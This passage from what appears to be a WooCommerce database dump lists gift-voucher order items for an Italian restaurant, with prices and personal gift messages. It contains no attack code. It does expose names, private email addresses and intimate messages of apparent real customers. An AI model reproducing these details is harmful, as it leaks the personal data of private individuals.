_line_total','75'),(2158,231,'_line_tax','0'),(2159,231,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2160,232,'_product_id','472'),(2161,232,'_variation_id','0'),(2162,232,'_qty','1'),(2163,232,'_tax_class',''),(2164,232,'_line_subtotal','120'),(2165,232,'_line_subtotal_tax','0'),(2166,232,'_line_total','120'),(2167,232,'_line_tax','0'),(2168,232,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2169,232,'To','Sole'),(2170,232,'From','Rossella'),(2171,232,'Message','Tantissimi auguri Pastrocchietta del mio cuore.\r\nTi voglio bene!!!! <3'),(2172,232,'Delivery Method','Downloadable'),(2173,232,'Original Price','120'),(2174,233,'_product_id','548'),(2175,233,'_variation_id','0'),(2176,233,'_qty','1'),(2177,233,'_tax_class',''),(2178,233,'_line_subtotal','50'),(2179,233,'_line_subtotal_tax','0'),(2180,233,'_line_total','50'),(2181,233,'_line_tax','0'),(2182,233,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2183,233,'To','Tommaso Tonelli'),(2184,233,'From','Alessia Colognesi e Andrea Pontiroli'),(2185,233,'Message','Che sia un anno di nuove scoperte e belle soddisfazioni. Intanto cominciamo con questo nuovo ristorante da scoprire.\r\nAlessia e Andrew'),(2186,233,'Delivery Method','Downloadable'),(2187,233,'Original Price','50'),(2188,234,'_product_id','475'),(2189,234,'_variation_id','0'),(2190,234,'_qty','1'),(2191,234,'_tax_class',''),(2192,234,'_line_subtotal','115'),(2193,234,'_line_subtotal_tax','0'),(2194,234,'_line_total','115'),(2195,234,'_line_tax','0'),(2196,234,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2197,234,'To','Villa Gladys Maria'),(2198,234,'From','Martina, Omar e Alessia'),(2199,234,'Message','Nella speranza di poter realizzare almeno un tuo desiderio!\r\n\r\nTantissimi auguri di buon compleanno!\r\nTi vogliamo bene!'),(2200,234,'Delivery Method','Downloadable'),(2201,234,'Original Price','115'),(2202,235,'_product_id','475'),(2203,235,'_variation_id','0'),(2204,235,'_qty','1'),(2205,235,'_tax_class',''),(2206,235,'_line_subtotal','115'),(2207,235,'_line_subtotal_tax','0'),(2208,235,'_line_total','115'),(2209,235,'_line_tax','0'),(2210,235,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2211,235,'To','Renato Bernardini'),(2212,235,'From','Fabio, Monia e Renata'),(2213,235,'Message','Tanti Auguri......Buon Mezzo Secolo!!!\r\nFabio, Monia e Renata'),(2214,235,'Delivery Method','Downloadable'),(2215,235,'Original Price','115'),(2216,236,'_product_id','472'),(2217,236,'_variation_id','0'),(2218,236,'_qty','1'),(2219,236,'_tax_class',''),(2220,236,'_line_subtotal','120'),(2221,236,'_line_subtotal_tax','0'),(2222,236,'_line_total','120'),(2223,236,'_line_tax','0'),(2224,236,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2225,236,'To','Guerrino & Mariella'),(2226,236,'From','Vali Laura Maicol Manu Mirco'),(2227,236,'Message','Tantissimi auguri e godetevi questa cenetta!!!'),(2228,236,'Delivery Method','Downloadable'),(2229,236,'Original Price','120'),(2230,237,'_product_id','548'),(2231,237,'_variation_id','0'),(2232,237,'_qty','1'),(2233,237,'_tax_class',''),(2234,237,'_line_subtotal','100'),(2235,237,'_line_subtotal_tax','0'),(2236,237,'_line_total','100'),(2237,237,'_line_tax','0'),(2238,237,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2239,237,'To','manmilly@libero.it'),(2240,237,'From','Milly, Manu, Angy, Andre e Giuly'),(2241,237,'Message','Mare... Tramonto...Cena...Lelli...non manca nient\'altro...\r\nAh sì! AUGURISSIMI LILLYNA!!!!!'),(2242,237,'Delivery Method','Mail to recipient'),(2243,237,'Original Price','100'),(2244,238,'_product_id','435'),(2245,238,'_variation_id','0'),(2246,238,'_qty','1'),(2247,238,'_tax_class',''),(2248,238,'_line_subtotal','98'),(2249,238,'_line_subtotal_tax','0'),(2250,238,'_line_total','98'),(2251,238,'_line_tax','0'),(2252,238,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2253,238,'To','ROBERTO '),(2254,238,'From','ELISA'),(2255,238,'Message','PER IL NOSTRO PRIMO DEI TANTI TRAGUARDI ASSIEME '),(2256,238,'Delivery Method','Downloadable'),(2257,238,'Original Price','98'),(2258,239,'_product_id','472'),(2259,239,'_variation_id','0'),(2260,239,'_qty','1'),(2261,239,'_tax_class',''),(2262,239,'_line_subtotal','120'),(2263,239,'_line_subtotal_tax','0'),(2264,239,'_line_total','120'),(2265,239,'_line_tax','0'),(2266,239,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2267,239,'To','ulissedellavittoria@gmail.com'),(2268,239,'From','liquim@libero.it'),(2269,239,'Message','Un pensiero per  entrambi : l\'impegno e l\'amore per la cucina che troverete in questo locale come specchio dell\'impegno e dell\'amore che sta lastricando la vostra strada. Pa\' e Ma\''),(2270,239,'Delivery Method','Mail to recipient'),(2271,239,'Original Price','120'),(2272,240,'_product_id','472'),(2273,240,'_variation_id','0'),(2274,240,'_qty','1'),(2275,240,'_tax_class',''),(2276,240,'_line_subtotal','120'),(2277,240,'_line_subtotal_tax','0'),(2278,240,'_line_total','120'),(2279,240,'_line_tax','0'),(2280,240,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2281,240,'To','ulissedellavittoria@gmail.com'),(2282,240,'From','Rossana e Renato Della Vittoria'),(2283,240,'Message','UN PENSIERO PER ENTRAMBI : L\'IMPEGNO E L\'AMORE PER LA CUCINA CHE TROVERETE IN QUESTO LOCALE COME SPECCHIO DELL\'IMPEGNO E DELL\'AMORE CHE STA LASTRICANDO LA VOSTRA STRADA. PA\' E MA\''),(2284,240,'Delivery Method','Mail to recipient'),(2285,240,'Original Price','120'),(2286,241,'_product_id','472'),(2287,241,'_variation_id','0'),(2288,241,'_qty','1'),(2289,241,'_tax_class',''),(2290,241,'_line_subtotal','120'),(2291,241,'_line_subtotal_tax','0'),(2292,241,'_line_total','120'),(2293,241,'_line_tax','0'),(2294,241,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2295,241,'To','ulissedellavittoria@gmail.com'),(2296,241,'From','Rossana e Renato Della Vittoria'),(2297,241,'Message','UN PENSIERO PER ENTRAMBI : L\'IMPEGNO E L\'AMORE PER LA CUCINA CHE TROVERETE IN QUESTO LOCALE COME SPECCHIO DELL\'IMPEGNO E DELL\'AMORE CHE STA LASTRICANDO LA VOSTRA STRADA. PA\' E MA\''),(2298,241,'Delivery Method','Mail to recipient'),(2299,241,'Original Price','120'),(2300,242,'_product_id','472'),(2301,242,'_variation_id','0'),(2302,242,'_qty','1'),(2303,242,'_tax_class',''),(2304,242,'_line_subtotal','120'),(2305,242,'_line_subtotal_tax','0'),(2306,242,'_line_total','120'),(2307,242,'_line_tax','0'),(2308,242,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2309,242,'To Name','Ingemar Ander'),(2310,242,'To','gungo80@gmail.com'),(2311,242,'From','Era söner'),(2312,242,'Message','Gratulerar på 75:årsdagarna kära Pappa och Mamma! Nu bjuds ni på en middag som ni förmodligen inte hade unnat er själva. Hoppas det smakar.'),(2313,242,'Delivery Method','Mail to recipient'),(2314,242,'Original Price','120'),(2315,243,'_product_id','472'),(2316,243,'_variation_id','0'),(2317,243,'_qty','1'),(2318,243,'_tax_class',''),(2319,243,'_line_subtotal','120'),(2320,243,'_line_subtotal_tax','0'),(2321,243,'_line_total','120'),(2322,243,'_line_tax','0'),(2323,243,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2324,243,'To','Marta'),(2325,243,'From','Michela'),(2326,243,'Message','Tanti Auguri amica mia !!! \r\nQuale miglior modo per festeggiare questi 29 anni ? \r\n\r\nTi voglio bene .'),(2327,243,'Delivery Method','Downloadable'),(2328,243,'Original Price','120'),(2329,244,'_product_id','435'),(2330,244,'_variation_id','0'),(2331,244,'_qty','1'),(2332,244,'_tax_class',''),(2333,244,'_line_subtotal','98'),(2334,244,'_line_subtotal_tax','0'),(2335,244,'_line_total','98'),(2336,244,'_line_tax','0'),(2337,244,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2338,244,'To','magnaromagna@gmail.com'),(2339,245,'_product_id','548'),(2340,245,'_variation_id','0'),(2341,245,'_qty','1'),(2342,245,'_tax_class',''),(2343,245,'_line_subtotal','0.1'),(2344,245,'_line_subtotal_tax','0'),(2345,245,'_line_total','0.1'),(2346,245,'_line_tax','0'),(2347,245,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2348,245,'To','webmaster@baldisserri.com'),(2349,245,'From','Franco'),(2350,245,'Message','prova'),(2351,245,'Delivery Method','Mail to recipient'),(2352,246,'_product_id','474'),(2353,246,'_variation_id','0'),(2354,246,'_qty','1'),(2355,246,'_tax_class',''),(2356,246,'_line_subtotal','90'),(2357,246,'_line_subtotal_tax','0'),(2358,246,'_line_total','90'),(2359,246,'_line_tax','0'),(2360,246,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2361,246,'To','Franco e Simonetta'),(2362,246,'From','Simone e Annalisa'),(2363,246,'Message','Tantissimi auguri di Buon Natale\r\n                    da \r\n     Simone Annalisa e Giulia'),(2364,246,'Delivery Method','Downloadable'),(2365,247,'_product_id','548'),(2366,247,'_variation_id','0'),(2367,247,'_qty','1'),(2368,247,'_tax_class',''),(2369,247,'_line_subtotal','150'),(2370,247,'_line_subtotal_tax','0'),(2371,247,'_line_total','150'),(2372,247,'_line_tax','0'),(2373,247,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2374,247,'To','lorenzo.prandini@virgilio.it'),(2375,247,'From','Lorenzo'),(2376,247,'Message','Un augurio di Buon Natale e un sereno 2019.\r\nLorenzo'),(2377,247,'Delivery Method','Downloadable'),(2378,248,'_product_id','548'),(2379,248,'_variation_id','0'),(2380,248,'_qty','1'),(2381,248,'_tax_class',''),(2382,248,'_line_subtotal','100'),(2383,248,'_line_subtotal_tax','0'),(2384,248,'_line_total','100'),(2385,248,'_line_tax','0'),(2386,248,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2387,248,'To','lorenzo.prandini@virgilio.it'),(2388,248,'From','Lorenzo'),(2389,248,'Message','Un grosso abbraccio. Lorenzo'),(2390,248,'Delivery Method','Downloadable'),(2391,249,'_product_id','288'),(2392,249,'_variation_id','0'),(2393,249,'_qty','1'),(2394,249,'_tax_class',''),(2395,249,'_line_subtotal','30'),(2396,249,'_line_subtotal_tax','0'),(2397,249,'_line_total','30'),(2398,249,'_line_tax','0'),(2399,249,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2400,249,'_reduced_stock','1'),(2401,250,'_product_id','288'),(2402,250,'_variation_id','0'),(2403,250,'_qty','1'),(2404,250,'_tax_class',''),(2405,250,'_line_subtotal','30'),(2406,250,'_line_subtotal_tax','0'),(2407,250,'_line_total','30'),(2408,250,'_line_tax','0'),(2409,250,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2410,250,'_reduced_stock','1'),(2411,251,'_product_id','288'),(2412,251,'_variation_id','0'),(2413,251,'_qty','1'),(2414,251,'_tax_class',''),(2415,251,'_line_subtotal','30'),(2416,251,'_line_subtotal_tax','0'),(2417,251,'_line_total','30'),(2418,251,'_line_tax','0'),(2419,251,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2420,252,'_product_id','288'),(2421,252,'_variation_id','0'),(2422,252,'_qty','1'),(2423,252,'_tax_class',''),(2424,252,'_line_subtotal','30'),(2425,252,'_line_subtotal_tax','0'),(2426,252,'_line_total','30'),(2427,252,'_line_tax','0'),(2428,252,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2429,252,'_reduced_stock','1'),(2430,253,'_product_id','288'),(2431,253,'_variation_id','0'),(2432,253,'_qty','1'),(2433,253,'_tax_class',''),(2434,253,'_line_subtotal','30'),(2435,253,'_line_subtotal_tax','0'),(2436,253,'_line_total','30'),(2437,253,'_line_tax','0'),(2438,253,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2439,254,'_product_id','288'),(2440,254,'_variation_id','0'),(2441,254,'_qty','1'),(2442,254,'_tax_class',''),(2443,254,'_line_subtotal','30'),(2444,254,'_line_subtotal_tax','0'),(2445,254,'_line_total','30'),(2446,254,'_line_tax','0'),(2447,254,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2448,254,'_reduced_stock','1'),(2449,255,'_product_id','288'),(2450,255,'_variation_id','0'),(2451,255,'_qty','1'),(2452,255,'_tax_class',''),(2453,255,'_line_subtotal','30'),(2454,255,'_line_subtotal_tax','0'),(2455,255,'_line_total','30'),(2456,255,'_line_tax','0'),(2457,255,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2458,255,'_reduced_stock','1'),(2459,256,'_product_id','288'),(2460,256,'_variation_id','0'),(2461,256,'_qty','1'),(2462,256,'_tax_class',''),(2463,256,'_line_subtotal','30'),(2464,256,'_line_subtotal_tax','0'),(2465,256,'_line_total','30'),(2466,256,'_line_tax','0'),(2467,256,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2468,256,'_reduced_stock','1'),(2469,257,'_product_id','288'),(2470,257,'_variation_id','0'),(2471,257,'_qty','1'),(2472,257,'_tax_class',''),(2473,257,'_line_subtotal','30'),(2474,257,'_line_subtotal_tax','0'),(2475,257,'_line_total','30'),(2476,257,'_line_tax','0'),(2477,257,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2478,257,'_reduced_stock','1'),(2479,258,'_product_id','288'),(2480,258,'_variation_id','0'),(2481,258,'_qty','1'),(2482,258,'_tax_class',''),(2483,258,'_line_subtotal','30'),(2484,258,'_line_subtotal_tax','0'),(2485,258,'_line_total','30'),(2486,258,'_line_tax','0'),(2487,258,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2488,258,'_reduced_stock','1'),(2489,259,'_product_id','288'),(2490,259,'_variation_id','0'),(2491,259,'_qty','1'),(2492,259,'_tax_class',''),(2493,259,'_line_subtotal','30'),(2494,259,'_line_subtotal_tax','0'),(2495,259,'_line_total','30'),(2496,259,'_line_tax','0'),(2497,259,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2498,259,'_reduced_stock','1'),(2499,260,'_product_id','288'),(2500,260,'_variation_id','0'),(2501,260,'_qty','1'),(2502,260,'_tax_class',''),(2503,260,'_line_subtotal','30'),(2504,260,'_line_subtotal_tax','0'),(2505,260,'_line_total','30'),(2506,260,'_line_tax','0'),(2507,260,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2508,260,'_reduced_stock','1'),(2509,261,'_product_id','288'),(2510,261,'_variation_id','0'),(2511,261,'_qty','1'),(2512,261,'_tax_class',''),(2513,261,'_line_subtotal','30'),(2514,261,'_line_subtotal_tax','0'),(2515,261,'_line_total','30'),(2516,261,'_line_tax','0'),(2517,261,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2518,261,'_reduced_stock','1'),(2519,262,'_product_id','288'),(2520,262,'_variation_id','0'),(2521,262,'_qty','1'),(2522,262,'_tax_class',''),(2523,262,'_line_subtotal','30'),(2524,262,'_line_subtotal_tax','0'),(2525,262,'_line_total','30'),(2526,262,'_line_tax','0'),(2527,262,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2528,262,'_reduced_stock','1'),(2529,263,'_product_id','288'),(2530,263,'_variation_id','0'),(2531,263,'_qty','1'),(2532,263,'_tax_class',''),(2533,263,'_line_subtotal','30'),(2534,263,'_line_subtotal_tax','0'),(2535,263,'_line_total','30'),(2536,263,'_line_tax','0'),(2537,263,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2538,263,'_reduced_stock','1'),(2539,264,'_product_id','288'),(2540,264,'_variation_id','0'),(2541,264,'_qty','1'),(2542,264,'_tax_class',''),(2543,264,'_line_subtotal','30'),(2544,264,'_line_subtotal_tax','0'),(2545,264,'_line_total','30'),(2546,264,'_line_tax','0'),(2547,264,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2548,264,'_reduced_stock','1'),(2549,265,'_product_id','288'),(2550,265,'_variation_id','0'),(2551,265,'_qty','1'),(2552,265,'_tax_class',''),(2553,265,'_line_subtotal','30'),(2554,265,'_line_subtotal_tax','0'),(2555,265,'_line_total','30'),(2556,265,'_line_tax','0'),(2557,265,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2558,265,'_reduced_stock','1'),(2559,266,'_product_id','288'),(2560,266,'_variation_id','0'),(2561,266,'_qty','1'),(2562,266,'_tax_class',''),(2563,266,'_line_subtotal','30'),(2564,266,'_line_subtotal_tax','0'),(2565,266,'_line_total','30'),(2566,266,'_line_tax','0'),(2567,266,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2568,266,'_reduced_stock','1'),(2569,267,'_product_id','288'),(2570,267,'_variation_id','0'),(2571,267,'_qty','1'),(2572,267,'_tax_class',''),(2573,267,'_line_subtotal','30'),(2574,267,'_line_subtotal_tax','0'),(2575,267,'_line_total','30'),(2576,267,'_line_tax','0'),(2577,267,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2578,267,'_reduced_stock','1'),(2579,268,'_product_id','288'),(2580,268,'_variation_id','0'),(2581,268,'_qty','1'),(2582,268,'_tax_class',''),(2583,268,'_line_subtotal','30'),(2584,268,'_line_subtotal_tax','0'),(2585,268,'_line_total','30'),(2586,268,'_line_tax','0'),(2587,268,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2588,268,'_reduced_stock','1'),(2589,269,'_product_id','288'),(2590,269,'_variation_id','0'),(2591,269,'_qty','1'),(2592,269,'_tax_class',''),(2593,269,'_line_subtotal','30'),(2594,269,'_line_subtotal_tax','0'),(2595,269,'_line_total','30'),(2596,269,'_line_tax','0'),(2597,269,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2598,269,'_reduced_stock','1'),(2599,270,'_product_id','288'),(2600,270,'_variation_id','0'),(2601,270,'_qty','1'),(2602,270,'_tax_class',''),(2603,270,'_line_subtotal','30'),(2604,270,'_line_subtotal_tax','0'),(2605,270,'_line_total','30'),(2606,270,'_line_tax','0'),(2607,270,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2608,270,'_reduced_stock','1'),(2609,271,'_product_id','288'),(2610,271,'_variation_id','0'),(2611,271,'_qty','1'),(2612,271,'_tax_class',''),(2613,271,'_line_subtotal','30'),(2614,271,'_line_subtotal_tax','0'),(2615,271,'_line_total','30'),(2616,271,'_line_tax','0'),(2617,271,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2618,271,'_reduced_stock','1'),(2619,272,'_product_id','288'),(2620,272,'_variation_id','0'),(2621,272,'_qty','1'),(2622,272,'_tax_class',''),(2623,272,'_line_subtotal','30'),(2624,272,'_line_subtotal_tax','0'),(2625,272,'_line_total','30'),(2626,272,'_line_tax','0'),(2627,272,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2628,272,'_reduced_stock','1'),(2629,273,'_product_id','288'),(2630,273,'_variation_id','0'),(2631,273,'_qty','1'),(2632,273,'_tax_class',''),(2633,273,'_line_subtotal','30'),(2634,273,'_line_subtotal_tax','0'),(2635,273,'_line_total','30'),(2636,273,'_line_tax','0'),(2637,273,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2638,273,'_reduced_stock','1'),(2639,274,'_product_id','472'),(2640,274,'_variation_id','0'),(2641,274,'_qty','1'),(2642,274,'_tax_class',''),(2643,274,'_line_subtotal','120'),(2644,274,'_line_subtotal_tax','0'),(2645,274,'_line_total','120'),(2646,274,'_line_tax','0'),(2647,274,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2648,274,'To','chbarile@live.com'),(2649,274,'From','Gio\''),(2650,274,'Message','6 mesi...6 buone ragioni per venire a questa cena con me:\r\n1 Augusto pare abbia deciso di pagare, approfittane;\r\n2 Dopo tutto questo studiare dei mercoledì ce lo meritiamo\r\n3 Perché è da troppo che aspettiamo di venire qua;\r\n4 Perché mi scegli \r\n5 Ogni giorno \r\n6 Nonostante tutto. '),(2651,274,'Delivery Method','Mail to recipient'),(2652,275,'_product_id','548'),(2653,275,'_variation_id','0'),(2654,275,'_qty','1'),(2655,275,'_tax_class',''),(2656,275,'_line_subtotal','100'),(2657,275,'_line_subtotal_tax','0'),(2658,275,'_line_total','100'),(2659,275,'_line_tax','0'),(2660,275,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2661,275,'To','christinaamplatz@gmail.com'),(2662,275,'From','Christina Amplatz'),(2663,275,'Message','Gutschein für ein Abendessen a`la Carte in Deinem geliebten Riccione=)\r\n\r\nLossts Enk guat gian! \r\n\r\n\r\nVon Herzen alles alles Liebe zum Geburtstag Andrea! Hon di fest gern... \r\n\r\n'),(2664,275,'Delivery Method','Downloadable'),(2665,275,'Image','IMG-20190101-WA0002.jpg'),(2666,276,'_product_id','548'),(2667,276,'_variation_id','0'),(2668,276,'_qty','1'),(2669,276,'_tax_class',''),(2670,276,'_line_subtotal','60'),(2671,276,'_line_subtotal_tax','0'),(2672,276,'_line_total','60'),(2673,276,'_line_tax','0'),(2674,276,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2675,276,'To','Silvia Saragoni'),(2676,276,'From','le amiche di sempre'),(2677,276,'Message','DOPO I 40 ANNI NOI DONNE NON COMPIAMO GLI ANNI....\r\nSALIAMO DI LIVELLO IN BELLEZZA, SAGGEZZA ED INCANTO..'),(2678,276,'Delivery Method','Downloadable'),(2679,276,'Image','IMG_1608.jpg'),(2680,277,'_product_id','548'),(2681,277,'_variation_id','0'),(2682,277,'_qty','1'),(2683,277,'_tax_class',''),(2684,277,'_line_subtotal','70'),(2685,277,'_line_subtotal_tax','0'),(2686,277,'_line_total','70'),(2687,277,'_line_tax','0'),(2688,277,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2689,277,'To','Silvia Saragoni'),(2690,277,'From','le amiche di sempre'),(2691,277,'Message','DOPO I 40 ANNI NOI DONNE NON COMPIAMO GLI ANNI....\r\nSALIAMO DI LIVELLO IN BELLEZZA, SAGGEZZA ED INCANTO..'),(2692,277,'Delivery Method','Downloadable'),(2693,277,'Image','IMG_1608.jpg'),(2694,278,'_product_id','548'),(2695,278,'_variation_id','0'),(2696,278,'_qty','1'),(2697,278,'_tax_class',''),(2698,278,'_line_subtotal','70'),(2699,278,'_line_subtotal_tax','0'),(2700,278,'_line_total','70'),(2701,278,'_line_tax','0'),(2702,278,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2703,278,'To','Silvia Saragoni'),(2704,278,'From','le amiche di sempre'),(2705,278,'Message','DOPO I 40 ANNI NOI DONNE NON COMPIAMO GLI ANNI....\r\nSALIAMO DI LIVELLO IN BELLEZZA, SAGGEZZA ED INCANTO..'),(2706,278,'Delivery Method','Downloadable'),(2707,278,'Image','IMG_1608.jpg'),(2708,279,'_product_id','322'),(2709,279,'_variation_id','0'),(2710,279,'_qty','1'),(2711,279,'_tax_class',''),(2712,279,'_line_subtotal','60'),(2713,279,'_line_subtotal_tax','0'),(2714,279,'_line_total','60'),(2715,279,'_line_tax','0'),(2716,279,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2717,280,'_product_id','322'),(2718,280,'_variation_id','0'),(2719,280,'_qty','1'),(2720,280,'_tax_class',''),(2721,280,'_line_subtotal','60'),(2722,280,'_line_subtotal_tax','0'),(2723,280,'_line_total','60'),(2724,280,'_line_tax','0'),(2725,280,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2726,280,'_reduced_stock','1'),(2727,281,'_product_id','631'),(2728,281,'_variation_id','0'),(2729,281,'_qty','1'),(2730,281,'_tax_class',''),(2731,281,'_line_subtotal','240'),(2732,281,'_line_subtotal_tax','0'),(2733,281,'_line_total','240'),(2734,281,'_line_tax','0'),(2735,281,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2736,281,'_reduced_stock','1'),(2737,282,'_product_id','337'),(2738,282,'_variation_id','0'),(2739,282,'_qty','1'),(2740,282,'_tax_class',''),(2741,282,'_line_subtotal','150'),(2742,282,'_line_subtotal_tax','0'),(2743,282,'_line_total','150'),(2744,282,'_line_tax','0'),(2745,282,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2746,282,'_reduced_stock','1'),(2747,283,'_product_id','322'),(2748,283,'_variation_id','0'),(2749,283,'_qty','1'),(2750,283,'_tax_class',''),(2751,283,'_line_subtotal','60'),(2752,283,'_line_subtotal_tax','0'),(2753,283,'_line_total','60'),(2754,283,'_line_tax','0'),(2755,283,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2765,285,'_product_id','327'),(2766,285,'_variation_id','0'),(2767,285,'_qty','1'),(2768,285,'_tax_class',''),(2769,285,'_line_subtotal','60'),(2770,285,'_line_subtotal_tax','0'),(2771,285,'_line_total','60'),(2772,285,'_line_tax','0'),(2773,285,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2774,286,'_product_id','327'),(2775,286,'_variation_id','0'),(2776,286,'_qty','1'),(2777,286,'_tax_class',''),(2778,286,'_line_subtotal','60'),(2779,286,'_line_subtotal_tax','0'),(2780,286,'_line_total','60'),(2781,286,'_line_tax','0'),(2782,286,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2783,286,'_reduced_stock','1'),(2793,288,'_product_id','334'),(2794,288,'_variation_id','0'),(2795,288,'_qty','1'),(2796,288,'_tax_class',''),(2797,288,'_line_subtotal','240'),(2798,288,'_line_subtotal_tax','0'),(2799,288,'_line_total','240'),(2800,288,'_line_tax','0'),(2801,288,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2802,288,'_reduced_stock','1'),(2803,289,'_product_id','548'),(2804,289,'_variation_id','0'),(2805,289,'_qty','1'),(2806,289,'_tax_class',''),(2807,289,'_line_subtotal','100'),(2808,289,'_line_subtotal_tax','0'),(2809,289,'_line_total','100'),(2810,289,'_line_tax','0'),(2811,289,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2812,289,'To','commerciale@uprise.it'),(2813,289,'From','Raimondi Marco '),(2814,289,'Message','Piccolo presente per ringraziare '),(2815,289,'Delivery Method','Mail to recipient'),(2816,290,'_product_id','324'),(2817,290,'_variation_id','0'),(2818,290,'_qty','1'),(2819,290,'_tax_class',''),(2820,290,'_line_subtotal','120'),(2821,290,'_line_subtotal_tax','0'),(2822,290,'_line_total','120'),(2823,290,'_line_tax','0'),(2824,290,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2825,290,'_reduced_stock','1'),(2826,291,'_product_id','322'),(2827,291,'_variation_id','0'),(2828,291,'_qty','1'),(2829,291,'_tax_class',''),(2830,291,'_line_subtotal','60'),(2831,291,'_line_subtotal_tax','0'),(2832,291,'_line_total','60'),(2833,291,'_line_tax','0'),(2834,291,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2835,291,'_reduced_stock','1'),(2836,292,'_product_id','325'),(2837,292,'_variation_id','0'),(2838,292,'_qty','1'),(2839,292,'_tax_class',''),(2840,292,'_line_subtotal','150'),(2841,292,'_line_subtotal_tax','0'),(2842,292,'_line_total','150'),(2843,292,'_line_tax','0'),(2844,292,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2845,292,'_reduced_stock','1'),(2846,293,'